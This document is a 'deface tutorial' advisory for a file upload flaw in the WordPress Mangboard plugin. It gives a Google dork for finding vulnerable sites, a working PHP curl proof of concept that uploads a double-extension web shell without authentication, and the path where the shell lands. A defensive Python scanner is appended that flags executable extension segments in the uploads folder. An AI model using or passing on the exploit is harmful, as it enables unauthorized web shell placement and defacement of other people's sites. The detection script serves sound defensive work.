Deface Tutorial: Mangboard Plugin File Upload Vulnerability Method
# Exploit Title: WordPress Mangboard Plugins File Upload Vulnerability
# Google Dork: inurl:wp-content/plugins/mangboard/
# Exploit : /wp-admin/admin-ajax.php
# Date: 16-04-2017
# Exploit Author: Isal Dot ID
# Vendor Homepage: https://srd.wordpress.org/plugins/mangboard/
# Version: webapps
# Tested on: Windows 7
1. Description
You can upload files without author access.
2. Proof of Concept
<?php
// The extension can be changed to php5, phtml, php.fla, etc.
$uploadfile = "yourfile.php.gif";
$ch = curl_init("http://target.com/wp-admin/admin-ajax.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata' => "@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Replace: target.com with the site you want to examine.
Shell folder: /wp-content/uploads/mangboard/years/month/random number/random_yourshell.php.gif
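To check a site for the result of this upload, scan the plugin's upload folder for file names that carry an executable extension in any segment, not only the last one. This is an added example, not code from the original post or from the Mangboard plugin; the function names, the constructed sample tree and the extensions beyond php5 and phtml are assumptions.

```python
import os
import tempfile

# Extensions a PHP-enabled server may execute. php5 and phtml come from the
# advisory; the others are an assumption about common handler configurations.
EXEC_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "pht", "phar"}


def executable_segments(filename):
    """Return executable extensions found in ANY dot-separated segment.

    Checking only the last extension misses names such as yourfile.php.gif,
    which Apache mod_mime can still hand to PHP when a handler is mapped
    to .php with AddHandler.
    """
    parts = filename.lower().split(".")
    return [p.strip() for p in parts[1:] if p.strip() in EXEC_EXTS]


def scan_uploads(root):
    """Walk an uploads tree and return sorted (relative_path, segments)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            hits = executable_segments(name)
            if hits:
                rel = os.path.relpath(os.path.join(dirpath, name), root)
                findings.append((rel.replace(os.sep, "/"), hits))
    return sorted(findings)


def build_sample_tree(root):
    """Constructed sample data mirroring the upload layout in the advisory."""
    names = ["2017/04/1234/ab12_photo.gif",
             "2017/04/1234/ab12_yourfile.php.gif",
             "2017/04/5678/cd34_page.phtml",
             "2017/04/5678/cd34_notes.txt"]
    for rel in names:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("constructed sample\n")


if __name__ == "__main__":
    # In practice, point scan_uploads() at wp-content/uploads/mangboard.
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for rel, hits in scan_uploads(tmp):
            print(f"SUSPICIOUS {rel} (executable segment: {', '.join(hits)})")
```

Any hit under the uploads folder deserves review, since that folder should hold only static content.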